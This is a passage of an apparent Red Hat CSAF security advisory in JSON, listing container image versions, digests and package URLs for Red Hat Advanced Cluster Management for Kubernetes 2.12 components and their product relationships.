"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"product_id": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"product_identification_helper": {
"purl": "pkg:oci/memcached-exporter-rhel9@sha256%3Ab321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773940676"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"product_id": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/metrics-collector-rhel9@sha256%3Ac834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"product_id": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-integrations-rhel9@sha256%3Ae671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-multicluster-observability-addon-rhel9@sha256%3A88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773674653"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"product_id": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-observability-rhel9-operator@sha256%3A0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-application-rhel9@sha256%3Af9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259182"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-channel-rhel9@sha256%3Ac4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773358651"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-subscription-rhel9@sha256%3A805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773090513"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"product_id": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/multiclusterhub-rhel9@sha256%3Ad448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773145770"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-must-gather-rhel9@sha256%3Adc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773358606"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"product_id": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"product_identification_helper": {
"purl": "pkg:oci/node-exporter-rhel9@sha256%3A6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680755"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9@sha256%3A31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773185861"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9-operator@sha256%3A7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233517"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"product_id": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-rhel9@sha256%3Ae528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680743"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"product_id": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-alertmanager-rhel9@sha256%3Abbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680634"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-config-reloader-rhel9@sha256%3A54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259208"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-rhel9@sha256%3Ab123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259157"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"product_id": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/rbac-query-proxy-rhel9@sha256%3Abaacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737262"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"product_id": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"product_identification_helper": {
"purl": "pkg:oci/search-collector-rhel9@sha256%3Ad1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773099472"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-indexer-rhel9@sha256%3A28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233417"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-api-rhel9@sha256%3Ab2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233463"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-rhel9@sha256%3A0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233441"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-siteconfig-rhel9@sha256%3Aea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773639113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"product_id": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"product_identification_helper": {
"purl": "pkg:oci/submariner-addon-rhel9@sha256%3Ad815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259185"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"product_id": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"product_identification_helper": {
"purl": "pkg:oci/thanos-rhel9@sha256%3A0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680856"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"product_id": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"product_identification_helper": {
"purl": "pkg:oci/thanos-receive-controller-rhel9@sha256%3A2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773185877"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"product": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"product_id": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"product_identification_helper": {
"purl": "pkg:oci/acm-volsync-addon-controller-rhel9@sha256%3Ab68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f?arch=s390x\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773531422"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le"
},
"product_reference": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
"product_id": "Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x"
},
"product_reference": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"relates_to_product_reference": "Red Hat Advanced Cluster Management for Kubernetes 2.12"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64 as a component of Red Hat Advanced Cluster Management for Kubernetes 2.12",
